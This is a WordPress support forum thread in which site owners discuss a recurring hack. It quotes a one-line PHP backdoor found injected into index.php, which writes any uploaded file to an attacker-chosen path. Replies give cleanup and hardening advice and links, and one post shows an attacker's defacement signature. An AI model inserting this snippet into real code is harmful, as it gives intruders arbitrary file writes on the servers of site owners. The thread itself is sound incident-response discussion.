Title: Random $_FILES['F1l3'] Code
Last modified: August 24, 2016

---

# Random $_FILES['F1l3'] Code

 *  Resolved [Kazam Creative](https://wordpress.org/support/users/goldenagemedia/)
 * (@goldenagemedia)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/random-_filesf1l3-code/)
 * I have a website where, every now and then the index.php file in the root directory
   gets modified and the following line of code gets added at the very top:
 * `if ($_FILES['F1l3']) {move_uploaded_file($_FILES['F1l3']['tmp_name'], $_POST['
   Name']); echo 'OK'; Exit;}`
 * This line of code then appears at the top of the live website, which I have to
   keep going in and deleting. I did a Google search but all I could find were dozens
   of other websites with the same problem. Does anyone know what this is and why
   it continues to appear in the index file?
 * I am using the theme Terso, FYI.

Viewing 15 replies - 1 through 15 (of 15 total)

 *  [kmessinger](https://wordpress.org/support/users/kmessinger/)
 * (@kmessinger)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/random-_filesf1l3-code/#post-5961255)
 * [http://www.goldenagemedia.com.au/](http://www.goldenagemedia.com.au/) this site?
 *  [kmessinger](https://wordpress.org/support/users/kmessinger/)
 * (@kmessinger)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/random-_filesf1l3-code/#post-5961256)
 * I see this right away
    WordPress version outdated: Upgrade required. Outdated
   WordPress Found: WordPress Under 4.0 Outdated Web Server Apache Found: Apache/
   2.2.24
 *  Thread Starter [Kazam Creative](https://wordpress.org/support/users/goldenagemedia/)
 * (@goldenagemedia)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/random-_filesf1l3-code/#post-5961257)
 * No not that site. It doesn’t matter what site it is, as I’ve removed the offending
   code already.
 * Besides, an outdated version of wordpress should not cause the issue as stated
   above.
 *  [kmessinger](https://wordpress.org/support/users/kmessinger/)
 * (@kmessinger)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/random-_filesf1l3-code/#post-5961264)
 * > Besides, an outdated version of wordpress should not cause the issue as stated
   > above.
 *  Well, it certainly will make the site unsecured.
 *  Thread Starter [Kazam Creative](https://wordpress.org/support/users/goldenagemedia/)
 * (@goldenagemedia)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/random-_filesf1l3-code/#post-5961281)
 * I’m only looking for solutions to my initial problem, please try and stay on 
   topic.
 *  [stephencottontail](https://wordpress.org/support/users/stephencottontail/)
 * (@stephencottontail)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/random-_filesf1l3-code/#post-5961287)
 * I think kmessinger’s point was that being unsecured is likely related to your
   problem, given the kinds of sites that are appearing in the Google results. You
   may wish to review some of these resources:
 * [http://codex.wordpress.org/FAQ_My_site_was_hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked)
   
   [http://wordpress.org/support/topic/268083#post-1065779](http://wordpress.org/support/topic/268083#post-1065779)
   [http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/](http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/)
   [http://ottopress.com/2009/hacked-wordpress-backdoors/](http://ottopress.com/2009/hacked-wordpress-backdoors/)
 * Additional Resources:
    [http://codex.wordpress.org/Hardening_WordPress](http://codex.wordpress.org/Hardening_WordPress)
   [http://sitecheck.sucuri.net/scanner/](http://sitecheck.sucuri.net/scanner/) 
   [http://www.unmaskparasites.com/](http://www.unmaskparasites.com/) [http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html](http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html)
 *  Thread Starter [Kazam Creative](https://wordpress.org/support/users/goldenagemedia/)
 * (@goldenagemedia)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/random-_filesf1l3-code/#post-5961296)
 * Thanks Stephen. The website was hacked despite wordpress and plugins being up
   to date, so I replaced all wordpress install files/folders, upgraded the theme
   and changed both FTP and wordpress passwords.
 * It seems to be just this `$_FILES['F1l3']` thing that has come back twice now
   after deletion.
 *  [raghavendra89](https://wordpress.org/support/users/raghavendra89/)
 * (@raghavendra89)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/random-_filesf1l3-code/#post-5961424)
 * Hello ‘goldenagemedia’,
 * My site was hacked yesterday night. Even I see similar content ($_FILES[‘F1l3’])
   in some of wordpress files.
 * After upgrading wordpress and theme is your site back? Did you do anything else
   to fix the issue?
 * Thanks,
 *  Thread Starter [Kazam Creative](https://wordpress.org/support/users/goldenagemedia/)
 * (@goldenagemedia)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/random-_filesf1l3-code/#post-5961445)
 * [@raghavendra89](https://wordpress.org/support/users/raghavendra89/),
 * Yes I managed to get it up and running again after reinstalling everything, although
   overnight it seems to have happened again.
 * I have replaced the index.php and wp-blog-header.php files again to fix it, but
   here is a screengrab of the problem when it happens:
    [https://drive.google.com/file/d/0B_DiQO5cOpWkczA0em9hSGVLcDg/view](https://drive.google.com/file/d/0B_DiQO5cOpWkczA0em9hSGVLcDg/view)
 * I think this site might just be being targeted, not sure.
 *  [WPyogi](https://wordpress.org/support/users/wpyogi/)
 * (@wpyogi)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/random-_filesf1l3-code/#post-5961446)
 * >  it seems to have happened again.
 * That’s generally what happens with hacked sites unless you’ve fully cleaned up
   the hack and secured the site. Did you go through all of the resources listed
   above?
 *  Thread Starter [Kazam Creative](https://wordpress.org/support/users/goldenagemedia/)
 * (@goldenagemedia)
 * [11 years, 2 months ago](https://wordpress.org/support/topic/random-_filesf1l3-code/#post-5961447)
 * Yes I’ve dealt with many hacked sites over the years, and the methods such as
   the ones listed above have usually fixed them, with no recurring issues.
 * This one is different to what I’ve dealt with before (I’ve never seen this code
   also). No matter how many times I remove the malicious code, it keeps coming 
   back a few days later.
 *  [AnnaBell](https://wordpress.org/support/users/blshka/)
 * (@blshka)
 * [11 years, 1 month ago](https://wordpress.org/support/topic/random-_filesf1l3-code/#post-5961546)
 * Hello everyone, im new here.
    Sorry I know this topic is old but I just found
   out that one of my websites are having the same problem as described above. I
   cleaned all files where I found that pice of code, and I removed one file called
   zxcvbnm.php where was this piece of code:
 *     ```
       <!--------------------------------------------
       Sat Apr  4 18:05:04 EST 2015
       owned by NG689Skw (Index Php)
       ng689skw@yahoo.com, Indonesia
       twitter.com/_IndexPhp_
       --------------------------------------------->
   
       Malware code deleted
       ```
   
 * Also i updated wordpress and all plugins, but I am curious how this Indonesians
   get into this website. What should I do to prevent to happen again?
    Did anyone
   found out how to get rid of this for good?
 *  Moderator [Jan Dembowski](https://wordpress.org/support/users/jdembowski/)
 * (@jdembowski)
 * Forum Moderator and Brute Squad
 * [11 years, 1 month ago](https://wordpress.org/support/topic/random-_filesf1l3-code/#post-5961548)
 * [@blshka](https://wordpress.org/support/users/blshka/) Please do not post malware
   code in these forums.
 * Delousing a compromised installation isn’t easy but all that we can offer is 
   in this list of links.
 * You need to start working your way through these resources:
    [http://codex.wordpress.org/FAQ_My_site_was_hacked](http://codex.wordpress.org/FAQ_My_site_was_hacked)
   [http://wordpress.org/support/topic/268083#post-1065779](http://wordpress.org/support/topic/268083#post-1065779)
   [http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/](http://smackdown.blogsblogsblogs.com/2008/06/24/how-to-completely-clean-your-hacked-wordpress-installation/)
   [http://ottopress.com/2009/hacked-wordpress-backdoors/](http://ottopress.com/2009/hacked-wordpress-backdoors/)
 * Additional Resources:
    [Hardening WordPress](http://codex.wordpress.org/Hardening_WordPress)
   [http://sitecheck.sucuri.net/scanner/](http://sitecheck.sucuri.net/scanner/) 
   [http://www.unmaskparasites.com/](http://www.unmaskparasites.com/) [http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html](http://blog.sucuri.net/2012/03/wordpress-understanding-its-true-vulnerability.html)
   [http://blog.sucuri.net/2010/07/understanding-and-cleaning-the-pharma-hack-on-wordpress.html](http://blog.sucuri.net/2010/07/understanding-and-cleaning-the-pharma-hack-on-wordpress.html)
 *  Thread Starter [Kazam Creative](https://wordpress.org/support/users/goldenagemedia/)
 * (@goldenagemedia)
 * [11 years, 1 month ago](https://wordpress.org/support/topic/random-_filesf1l3-code/#post-5961549)
 * AnnaBell,
 * I fixed my hacked website by performing the following steps:
 * 1. Changed passwords for both WordPress backend and FTP hosting account.
    2. 
   Deleted wp-includes, wp-admin and root files (except the wp-config.php) 4. Opened
   my wp-config.php file to make sure there was no malware code in it 3. Re-installed
   WordPress files/folders manually 4. Updated all plugins 5. Installed Wordfence
   plugin and ran a scan 6. Found files that were infected or shouldn’t be there
   and either had them removed by Wordfence or found the file via FTP and removed
   the malware from the file
 * FYI: I found alot of new files were strewn throughout the Uploads folder. Wordfence
   was great as it picked up on all these and I just deleted them via Wordfence.
 * The unfortunate reality is hacking is just a part of web life now. I have had
   a fair few websites hacked lately by the [Gantengers Crew](https://twitter.com/gantengerscrew)
   from Indonesia, who openly gloat about their hacking accomplishments.
 * Hope this helps you.
 *  [AnnaBell](https://wordpress.org/support/users/blshka/)
 * (@blshka)
 * [11 years, 1 month ago](https://wordpress.org/support/topic/random-_filesf1l3-code/#post-5961550)
 * Thanx guys for all advices,
    I did most of those things you mentioned, so far
   everything looks good. Hopefully it will not come back. Thnx once again

Viewing 15 replies - 1 through 15 (of 15 total)

The topic ‘Random $_FILES['F1l3'] Code’ is closed to new replies.

## Tags

 * [file](https://wordpress.org/support/topic-tag/file/)
 * [hacked](https://wordpress.org/support/topic-tag/hacked/)
 * [index](https://wordpress.org/support/topic-tag/index/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 15 replies
 * 7 participants
 * Last reply from: [AnnaBell](https://wordpress.org/support/users/blshka/)
 * Last activity: [11 years, 1 month ago](https://wordpress.org/support/topic/random-_filesf1l3-code/#post-5961550)
 * Status: resolved

## Topics

### Topics with no replies

### Non-support topics

### Resolved topics

### Unresolved topics

### All topics